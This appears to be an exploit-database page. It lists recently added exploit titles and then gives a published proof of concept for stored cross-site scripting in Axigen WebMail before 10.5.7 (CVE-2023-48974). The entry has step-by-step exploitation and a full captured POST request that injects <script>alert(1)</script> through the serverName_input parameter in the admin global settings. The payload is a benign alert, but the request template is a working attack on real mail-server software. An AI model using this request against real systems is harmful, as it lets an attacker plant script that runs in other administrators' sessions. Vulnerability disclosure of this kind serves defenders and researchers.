
28 changes to exploits/shellcodes/ghdb Casdoor < v1.331.0 - '/api/set-password' CSRF GL-iNet MT6000 4.5.5 - Arbitrary File Download Axigen < 10.5.7 - Persistent Cross-Site Scripting Blood Bank v1.0 - Stored Cross Site Scripting (XSS) CE Phoenix v1.0.8.20 - Remote Code Execution Daily Habit Tracker 1.0 - Broken Access Control Daily Habit Tracker 1.0 - SQL Injection Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS) E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS) Elementor Website Builder < 3.12.2 - Admin+ SQLi Employee Management System 1.0 - _txtfullname_ and _txtphone_ SQL Injection Employee Management System 1.0 - _txtusername_ and _txtpassword_ SQL Injection (Admin Login) FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI) FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI) Gibbon LMS v26.0.00 - SSTI vulnerability Hospital Management System v1.0 - Stored Cross Site Scripting (XSS) LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated) Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated) OpenCart Core 4.0.2.3 - 'search' SQLi Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal Smart School 6.4.1 - SQL Injection Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated) ASUS Control Center Express 01.06.15 - Unquoted Service Path Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
65 lines
No EOL
2.5 KiB
Text
65 lines
No EOL
2.5 KiB
Text
# Exploit Title: Axigen < 10.5.7 - Persistent Cross-Site Scripting
|
|
# Date: 2023-09-25
|
|
# Exploit Author: Vinnie McRae - RedTeamer IT Security
|
|
# Vendor Homepage: https://www.axigen.com/
|
|
# Software Link: https://www.axigen.com/mail-server/download/
|
|
# Version: (10.5.7) and older version of Axigen WebMail
|
|
# Tested on: firefox, chrome
|
|
# CVE: CVE-2023-48974
|
|
|
|
Description
|
|
|
|
The `serverName_input` parameter is vulnerable to stored cross-site
|
|
scripting (XSS) due to unsanitized or unfiltered processing. This means
|
|
that an attacker can inject malicious code into this parameter, which will
|
|
then be executed by other users when they view the page where the parameter
|
|
is used. This is affecting authenticated administrators, and the attack can
|
|
be used to attack other administrators with more permissions.
|
|
|
|
Exploitation
|
|
|
|
1. Login as administrator
|
|
2. Navigate to "global settings"
|
|
3. Change server name to <script>alert(1)</script>
|
|
|
|
PoC of the POST request:
|
|
|
|
```
|
|
POST /?_h=1bb40e85937506a7186a125bd8c5d7ef&page=gl_set HTTP/1.1
|
|
Host: localhost:9443
|
|
Cookie: eula=true;
|
|
WMSessionObject=%7B%22accountFilter%22%3A%22%22%2C%22currentDomainName%22%3A%22axigen%22%2C%22currentPrincipal%22%3A%22nada%22%2C%22domainFilter%22%3A%22%22%2C%22folderRecipientFilter%22%3A%22%22%2C%22groupFilter%22%3A%22%22%2C%22helpContainer%22%3A%22opened%22%2C%22leftMenu%22%3A%5B%22rights%22%2C%22services%22%2C%22clustering%22%2C%22domains%22%2C%22logging%22%2C%22backup%22%2C%22security%22%5D%2C%22mlistFilter%22%3A%22%22%2C%22premiumFilter%22%3A%22%22%2C%22sslCertificateFilter%22%3A%22%22%7D;
|
|
webadminIsModified=false; webadminIsUpdated=true; webadminIsSaved=true;
|
|
public_language=en; _hadmin=6a8ed241fe53d1b28f090146e4c65f52;
|
|
menuLeftTopPosition=-754
|
|
Content-Type: multipart/form-data;
|
|
boundary=---------------------------41639384187581032291088896642
|
|
Content-Length: 12401
|
|
Connection: close
|
|
|
|
-----------------------------41639384187581032291088896642
|
|
Content-Disposition: form-data; name="serverName_input"
|
|
|
|
<script>alert(1)</script>
|
|
-----------------------------41639384187581032291088896642
|
|
Content-Disposition: form-data; name="primary_domain_input"
|
|
|
|
axigen
|
|
-----------------------------41639384187581032291088896642
|
|
Content-Disposition: form-data; name="ssl_random_file_input"
|
|
|
|
--SNIP--
|
|
|
|
-----------------------------41639384187581032291088896642
|
|
Content-Disposition: form-data; name="update"
|
|
|
|
Save Configuration
|
|
-----------------------------41639384187581032291088896642--
|
|
```
|
|
|
|
|
|
|
|
#______________________________
|
|
#Vinnie McRae
|
|
#RedTeamer IT Security
|
|
#Blog: redteamer.de/blog-beitrag/ |